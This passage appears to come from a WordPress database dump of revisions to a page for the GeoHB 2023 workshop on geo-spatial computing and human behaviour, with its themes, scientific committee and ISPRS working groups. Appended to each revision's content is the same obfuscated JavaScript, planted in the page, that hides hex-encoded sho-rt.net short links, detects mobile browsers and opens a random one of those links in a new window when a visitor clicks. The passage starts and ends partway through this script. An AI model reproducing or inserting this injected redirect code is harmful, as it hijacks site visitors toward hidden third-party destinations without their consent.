)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GeoHB 2023: Geo-Spatial Computing for Understanding Human Behaviours','','inherit','closed','closed','','2791-revision-v1','','','2023-01-07 13:58:30','2023-01-07 13:58:30','',2791,'https://gsw2023.com/?p=3532',0,'revision','',0),
(3533,1,'2023-01-07 14:08:24','2023-01-07 14:08:24','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2816\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>Urban spaces have become complex, being shaped by diverse human behaviours. Therefore, the sustainability of development has faced various challenges ranging from pollution to equity in accessibility to activity spaces and opportunities. Using spatial big data and new computing technologies is an effective way to a better understanding of the interaction between individuals and urban environments, which would be beneficial to tackle urban challenges. This workshop focuses on new advanced technologies on spatial data representation and interoperability, geo-computation and -simulation, and GeoAI, which can harness human behaviour related spatial big data, discovering the mechanisms of the interaction between human behaviours and urban environments.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"49\"][vc_row_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5></h5>\n<h5><strong>Themes of event:</strong></h5>\n<ul>\n<li>Geo-computation and geo-simulation models for understanding human mobility patterns and underlying mechanisms of the interactions between human behaviours and urban environments</li>\n<li>Computational time geographical methods for modelling and representing human activity-travel behaviour</li>\n<li>Spatio-temporal data mining methods for uncovering human behaviour and its interactions with urban environments</li>\n<li>Knowledge-based geo-computation for reasoning human behaviour contexts</li>\n<li>GeoAI-based technique for sensing urban environments using spatio-temporal big data</li>\n<li>Computational methods for analysing individual and collective behaviour uncertainties within complex systems</li>\n<li>Reliability-based measures for quantifying accessibility under behavioural and environmental uncertainties</li>\n<li>Reliable geo-computation methods for optimizing activity-travel scheduling under uncertainties</li>\n<li>Conceptual models for human behaviour related spatial data representation and associated data such as time series.</li>\n<li>Use case of international standards to foster scalability and reusability of solutions for human mobility big data.</li>\n<li>New solutions for effective and meaningful spatial data integration for human activity pattern study</li>\n<li>Geo-visualization and spatial representation methods of spatio-temporal big data on human mobility</li>\n<li>New developments of strategies and automated computational approaches for handling geo-privacy and ethical issues involved in the analysis of and use of individuals’ spatial data</li>\n</ul>\n<h5></h5>\n<h5></h5>\n<h5><strong>Scientific Committee:</strong></h5>\n<ul>\n<li>Pawel Boguslawski, Wroclaw University of Environmental and Life Sciences, Poland</li>\n<li>Elisabetta Colucci, Politecnico di Torino, Italy</li>\n<li>Chen-Chieh Feng, National University of Singapore, Singapore</li>\n<li>Rui Zhu, Agency for Science, Technology and Research, Singapore</li>\n<li>James Haworth, University College London, UK</li>\n<li>Tao Jia, Wuhan University, China</li>\n<li>Xiao Li, University of Oxford, UK</li>\n<li>Chun Liu, Tongji University, China</li>\n<li>Xintao Liu, The Hong Kong Polytechnic University, China</li>\n<li>Francesca Noardo, Open Geospatial Consortium</li>\n<li>Azarakhsh Rafiee-Voermans, Delft University of Technology, Netherlands</li>\n<li>PWitold Rohm, Wroclaw University of Environmental and Life Sciences, Poland</li>\n<li>Shih-Lung Shaw, University of Tennessee, Knoxville, USA</li>\n<li>Katarzyna Sila-Nowicka, University of Auckland, New Zealand</li>\n<li>Noam Shoval, Hebrew University of Jerusalem, Israel</li>\n<li>Donggen Wang, The Hong Kong Baptist University, China</li>\n<li>Martin Werner, Technical University of Munich, Germany</li>\n<li>René Westerholt, Technical University of Dortmund, Germany</li>\n<li>Hangbin Wu, Tongji University, China</li>\n<li>Marco Minghini, European Commission - Joint Research Centre (JRC), Italy</li>\n</ul>\n<h5></h5>\n<h5></h5>\n<h5><strong>Supporting ISPRS Working Groups:</strong></h5>\n<ul>\n<li>WG IV/1: Spatial data representation and interoperability</li>\n<li>WG IV/3: Geo-computation and geo-simulation</li>\n<li>ICWG IV/III/II: Openness in Geospatial Science and Remote Sensing</li>\n<li>WG IV/6: Human Behaviour and Spatial Interactions</li>\n</ul>\n<p>&nbsp;</p>\n<h5></h5>\n<h5></h5>\n<h5><strong>Special Issue for the workshop:</strong></h5>\n<p>The authors of selected papers in the workshop will be invited to submit an extended full paper to the Transactions in GIS (<a href=\"https://onlinelibrary.wiley.com/journal/14679671\">https://onlinelibrary.wiley.com/journal/14679671</a>; current impact factor: 2.568). The selected papers will go through the peer-review process of the journal.[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GeoHB 2023: Geo-Spatial Computing for Understanding Human Behaviours','','inherit','closed','closed','','2791-revision-v1','','','2023-01-07 14:08:24','2023-01-07 14:08:24','',2791,'https://gsw2023.com/?p=3533',0,'revision','',0),
(3534,1,'2023-01-07 14:09:42','2023-01-07 14:09:42','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2816\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>Urban spaces have become complex, being shaped by diverse human behaviours. Therefore, the sustainability of development has faced various challenges ranging from pollution to equity in accessibility to activity spaces and opportunities. Using spatial big data and new computing technologies is an effective way to a better understanding of the interaction between individuals and urban environments, which would be beneficial to tackle urban challenges. This workshop focuses on new advanced technologies on spatial data representation and interoperability, geo-computation and -simulation, and GeoAI, which can harness human behaviour related spatial big data, discovering the mechanisms of the interaction between human behaviours and urban environments.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"49\"][vc_row_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5></h5>\n<h5><strong>Themes of event:</strong></h5>\n<ul>\n<li>Geo-computation and geo-simulation models for understanding human mobility patterns and underlying mechanisms of the interactions between human behaviours and urban environments</li>\n<li>Computational time geographical methods for modelling and representing human activity-travel behaviour</li>\n<li>Spatio-temporal data mining methods for uncovering human behaviour and its interactions with urban environments</li>\n<li>Knowledge-based geo-computation for reasoning human behaviour contexts</li>\n<li>GeoAI-based technique for sensing urban environments using spatio-temporal big data</li>\n<li>Computational methods for analysing individual and collective behaviour uncertainties within complex systems</li>\n<li>Reliability-based measures for quantifying accessibility under behavioural and environmental uncertainties</li>\n<li>Reliable geo-computation methods for optimizing activity-travel scheduling under uncertainties</li>\n<li>Conceptual models for human behaviour related spatial data representation and associated data such as time series.</li>\n<li>Use case of international standards to foster scalability and reusability of solutions for human mobility big data.</li>\n<li>New solutions for effective and meaningful spatial data integration for human activity pattern study</li>\n<li>Geo-visualization and spatial representation methods of spatio-temporal big data on human mobility</li>\n<li>New developments of strategies and automated computational approaches for handling geo-privacy and ethical issues involved in the analysis of and use of individuals’ spatial data</li>\n</ul>\n<h5></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><strong>Scientific Committee:</strong></h5>\n<ul>\n<li>Pawel Boguslawski, Wroclaw University of Environmental and Life Sciences, Poland</li>\n<li>Elisabetta Colucci, Politecnico di Torino, Italy</li>\n<li>Chen-Chieh Feng, National University of Singapore, Singapore</li>\n<li>Rui Zhu, Agency for Science, Technology and Research, Singapore</li>\n<li>James Haworth, University College London, UK</li>\n<li>Tao Jia, Wuhan University, China</li>\n<li>Xiao Li, University of Oxford, UK</li>\n<li>Chun Liu, Tongji University, China</li>\n<li>Xintao Liu, The Hong Kong Polytechnic University, China</li>\n<li>Francesca Noardo, Open Geospatial Consortium</li>\n<li>Azarakhsh Rafiee-Voermans, Delft University of Technology, Netherlands</li>\n<li>PWitold Rohm, Wroclaw University of Environmental and Life Sciences, Poland</li>\n<li>Shih-Lung Shaw, University of Tennessee, Knoxville, USA</li>\n<li>Katarzyna Sila-Nowicka, University of Auckland, New Zealand</li>\n<li>Noam Shoval, Hebrew University of Jerusalem, Israel</li>\n<li>Donggen Wang, The Hong Kong Baptist University, China</li>\n<li>Martin Werner, Technical University of Munich, Germany</li>\n<li>René Westerholt, Technical University of Dortmund, Germany</li>\n<li>Hangbin Wu, Tongji University, China</li>\n<li>Marco Minghini, European Commission - Joint Research Centre (JRC), Italy</li>\n</ul>\n<h5></h5>\n<h5></h5>\n<h5><strong>Supporting ISPRS Working Groups:</strong></h5>\n<ul>\n<li>WG IV/1: Spatial data representation and interoperability</li>\n<li>WG IV/3: Geo-computation and geo-simulation</li>\n<li>ICWG IV/III/II: Openness in Geospatial Science and Remote Sensing</li>\n<li>WG IV/6: Human Behaviour and Spatial Interactions</li>\n</ul>\n<p>&nbsp;</p>\n<h5></h5>\n<h5></h5>\n<h5><strong>Special Issue for the workshop:</strong></h5>\n<p>The authors of selected papers in the workshop will be invited to submit an extended full paper to the Transactions in GIS (<a href=\"https://onlinelibrary.wiley.com/journal/14679671\">https://onlinelibrary.wiley.com/journal/14679671</a>; current impact factor: 2.568). The selected papers will go through the peer-review process of the journal.[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 